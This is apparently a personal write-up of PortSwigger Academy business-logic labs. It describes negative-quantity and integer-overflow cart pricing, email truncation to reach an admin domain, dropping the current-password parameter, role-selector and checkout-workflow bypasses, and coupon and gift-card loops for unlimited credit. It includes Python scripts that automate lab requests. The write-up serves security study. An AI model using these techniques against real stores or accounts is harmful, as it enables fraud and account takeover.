- Published on
Business Logic Labs Overview
Tools Used
- Burp Interceptor, Repeater and Intruder
- Python Scripts
Overview
while adding product in cart set its price in request as very low!!
We had to buy one leet jacket but here we could not set price. Hence we bought a thing for negative quantity and just bought one leet jacket
Store credit: $59.30
Home
|
My account
|
0
Your order is on its way!
Name Price Quantity
Lightweight "l33t" Leather Jacket $1337.00 1
Single Use Food Hider $86.42 -15
Total: $40.70
Observation
quantity field can be between ( and including ) = [-1000000000, 99] and takes only whole number ( wrong !! actually it will have an integer value so [ - Integer, + Integer ]
actually it depends on the integer bit that is being used 32 bit or 16 bit,
if 16 bit then the range is -32,768 to +32,767
if 32 bit then the range is [-2147483648 to 2147483647]
we will target total price
Solution
Solution in lowLevel.py. Its just that we had to exploit integer overflow in total price.
So we kept on adding price of any item * 99 and then as it overflows we are in negative region
then we add again and wait till it comes close to zero and when its near 0 we bring it within
store credit that is 100 coded solution could have been more concise and better.
# hacky script not a mature way to do this but for a single lab it works
import requests
def find_between( s, first, last ):
try:
start = s.index( first ) + len( first )
end = s.index( last, start )
return s[start:end]
except ValueError:
return ""
burp0_url = "https://acac1fcc1f75107fc0bc96cc00e50035.web-security-academy.net:443/cart"
burp0_cookies = {"session": "c7pFdZwzFg3lpGem8KWRBHqPLBJbeEh3"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://acac1fcc1f75107fc0bc96cc00e50035.web-security-academy.net/cart", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "Te": "trailers", "Connection": "close"}
# greatest positive integer for 16 bit is +32,767
# but here we can add only 99 at a time, so +32,767 / 99 = 329.56
# so we will test integer overflow
for i in range(1, 1000):
print(i)
burp0_data = {"productId": "1", "quantity": 2 , "redir": "CART"}
result = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
html = result.text
price= find_between(html, "<th>-$","</th>")
try:
price = float(price) * -1
print(price)
if(price < -2*1339 and price > -4*1339):
break
except Exception as e:
print(e)
print(price)
So eventually I had to view the solution 😢. Here we had to play with string length. So the backend only considers
first 255 characters of a string and truncates the request. So the email id is:
Which is 321 characters. after we truncate it till 255 characters we get email id a very big string@dontwannacry.com, which is staff email id and required to access admin account. Hence we have solved the lab
- A very interesting lab https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-weak-isolation-on-dual-use-endpoint
from theory on page https://portswigger.net/web-security/logic-flaws/examples
under heading >> Users won't always supply mandatory input
The request to change user password via change-password request takes this from
POST /my-account/change-password HTTP/1.1
....
csrf=TnvFiRt2yrF7ZsTAZ5CEtnFHEj9LNk9d&username=administrator¤-password=peter&new-password-1=peter&new-password-2=peter
HERE ITS NOT NECESSARY TO SEND current-password parameter !!!
-
A very tiring but interesting lab https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation
- Basic workflow, add products to cart > add valid coupon > checkout ( if value less than store credit )
- We cannot checkout l33t jacket as its value 1337 is higher than store credit, which is 100
- So, what eventually we did was add a product which is lower than 100 and do checkout on it
- Then after you have done checkout add your leet jacket and it will be added to your order
-
SOLVED IT !!
MY SOLUTION
- Logged in and then in role-selector I send role as "admin"
- I logged out and then logged in again but instead of getting redirected to role-selector I redirected my self to /admin . I believe the backend when redirects to /role-selector after login clears your previous role ( which I selected as admin )
- Then as I was redirected to /admin I was able to delete carlos ( sorry carlos😢 its just business )
PORTSWIGGER SOLUTION
-
With Burp running, complete the login process and notice that you need to select your role before you are taken to the home page. Use the content discovery tool to identify the
/adminpath. -
Try browsing to
/admindirectly from the role selection page and observe that this doesn't work. -
Log out and then go back to the login page. In Burp, turn on proxy intercept then log in. Forward the
POST /loginrequest. The next request isGET /role-selector. Drop this request and then browse to the lab's home page. Observe that your role has defaulted to theadministratorrole and you have access to the admin panel. Delete Carlos to solve the lab.OKAY SO I WAS WRONG THE DEFAULT ROLE IS ADMINISTRATOR
Observation 23 Nov
- Logged in as wiener, then you are redirected to role-selector page and you select role and then you are properly logged in ( like you can see my account )
- If you again go to role-selector and you select a role you will get error "No login credentials"
- Now if you set role again , you are redirected to login and your session expires hence "my-account" page is not visible.
- If you just go to role-selector page and then to my-account page your session expires too.
- If you don't select a role in role-selector directly after login ( redirection ) you won't get access to my-account page and will be redirected to login page if you visit my account.
Observations 22 Nov
- When you login it takes directly to role-selector. And then you select role.
- When you logout and login again you again have to select role
- The administrator page is at /admin
- In role-selector post request, you can send role as "administrator"
-
when you are not logged in you get this response
-
When you are logged in you are just re directed
-
-
- two coupons NEWCUST5 and SIGNUP30 ( when you sign up for newsletter )
Solution is
Add code one after another ( SINGUP30 you get from signing up for newsletter and NEWCUST5 is readily avaialble )
-
Lab url : https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-infinite-money
- Buy a product "Gift Card" ( with product id 2 ) and apply discount on it via code SIGNUP30 and then you will get a discounted card but the gift card value is 10. Hence use that code and refill your credit to value more than 100.
- Now continue doing this by adding multiple gift cards and accomodating enough store credit to purchase leet jacket
#Used this code to apply gift card code. import requests giftCards = ''' 2DlHFSTMZY aUkZZ9nQP7 rCoKrvDFVY 8sv5pB8Tva aCG945Mzsa ''' giftCards = giftCards.split() burp0_url = "https://ac7e1fea1f768fbac0c841c700630089.web-security-academy.net:443/gift-card" burp0_cookies = {"session": "kGqJ6lLJnEPma5B72BZLKKZTlYmqhNGy"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "https://ac7e1fea1f768fbac0c841c700630089.web-security-academy.net/my-account?id=wiener", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", "Te": "trailers", "Connection": "close"} for card in giftCards: print(card) burp0_data = {"csrf": "Y8kdJyCdvwzvHEYTIJKraDXqW8GYXQh3", "gift-card": card} requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)